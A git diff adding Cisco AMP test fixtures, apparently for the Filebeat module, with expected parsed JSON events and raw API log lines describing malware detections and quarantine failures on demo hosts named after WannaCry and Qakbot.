"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 49823, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:28:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 341000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412574627503014000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 51019, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204910251769881", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 50000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204910251770000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 51942, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204910251769885", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 596000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204910251770000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 53134, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802584", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 941000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 55679, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802583", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 894000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 56872, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802582", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 58065, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802581", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 59258, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802580", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 60451, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 644000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 61637, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 4688, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204901661835277", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 802000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 65559, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log new file mode 100644 index 000000000000..9842f3cbe934 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log @@ -0,0 +1,49 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 